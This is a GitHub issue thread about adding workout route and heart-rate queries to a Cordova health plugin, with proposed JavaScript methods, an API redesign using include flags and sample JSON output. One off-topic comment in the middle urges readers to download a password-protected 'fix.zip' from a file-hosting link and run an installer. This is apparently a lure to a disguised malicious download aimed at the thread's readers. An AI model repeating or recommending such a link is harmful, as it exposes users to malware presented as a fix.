### ISSUE TITLE
RFC: Query workout route and heart-rate data

### ISSUE THREAD

**Issue by mley** [dariosalvi78/cordova-plugin-health#332]
Hello

I am in progress of implementing an API to query workout route and heart-rate data. I want to agree on an API design with you before doing more work, so we can avoid discussion and changes later when I finish the pull-request.

So far I've added these methods to www/ios/health.js
```javascript
Health.prototype.queryWorkoutRoutes = function (workoutId, successCallback, errorCallback) {
  window.plugins.healthkit.queryWorkoutRoutes(workoutId, successCallback, errorCallback);
};

Health.prototype.queryHeartRateDuringWorkout = function (workoutId, successCallback, errorCallback) {
  window.plugins.healthkit.queryHeartRateDuringWorkout(workoutId, successCallback, errorCallback);
};
```

The Android implementation requires a different API, since route and heart-rate data is not related to a specific workout, but rather queried by start and end time. So the methods for Android would have the start and endtime as parameters, instead of the workout id.

The iOS implementation works already as expected, I haven't started with Android yet. See the complete changes here:
https://github.com/dariosalvi78/cordova-plugin-health/compare/master...mley:cordova-plugin-health:query-track-and-heartrate

Best regards
Martin

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dariosalvi78** [comment]
Hi Martin, this is great, thank you.

I think that it would make more sense to add both routes and heart rate to the general query function, particularly when querying "activity", which maps to "workout" on iOS and "exercise" on Android. The reason is because, as a user of the plugin, a) you don't need to issue 2 separate commands from the API, just one query and 2) you can hide details related to iOS, which uses workout ids, and Android, which uses start/end times.

This additional information, both routes and heart rate, should be made optional through a flag, similar to the already existing `includeCalories`or `includeDistance` flags. Something like `includeRoute` and `includeHeartRate` would do.

Example:
```js
cordova.plugins.health.query({
  startDate: new Date(new Date().getTime() - 24 * 60 * 60 * 1000), // 1 day ago
  endDate: new Date(), // now
  dataType: 'activity',
  includeRoute: true,
  includeHeartRate: true
}, successCallback, errorCallback)
```

Would return something like:
```json
[ {
    "startDate": "2024-10-02T10:30:00",
    "endDate": "2024-10-02T10:30:00",
    "value": "running",
    "unit": "activity",
    "route": [ 
       {
         "timestamp": "2024-10-02T10:30:05",
         "latitude": 52.20123443959539,
         "longitude": 7.334521387116028,
         "altitude": 216.2930361283943
       },
      ....
    ],
    "heartRate": [ 
       {
         "bpm":95,
         "timestamp":"2024-10-02T10:30:07"
       }
      ....
    ]
  }
...
]
```

Notice that I have changed the timestamps to be of type Date. This is for consistency with the rest of the API, and also because, likely, the developer will need to do that conversion anyway. As for the heart rate, we can call it "bpm", so the unit of measure is clear and the resulting json is also a bit shorter (less serialization/de-serialization overhead).

Note that internally the code can well be split into separate functions as you already have, and I am OK to even expose those functions in the JS interface for testing, however a unified "official" API would be probably preferable.

Let me know if this is reasonable. It shouldn't be a big change, but if you have problems I can try to help.

Thanks!

**Comment by mley** [comment]
Hi Dario,

thanks for the quick response. That all sounds reasonable. I will change the javascript API accordingly. I think I can keep the iOS native interface as is.

Best regards
Martin

**Comment by mley** [comment]
Pull request created here: https://github.com/dariosalvi78/cordova-plugin-health/pull/333
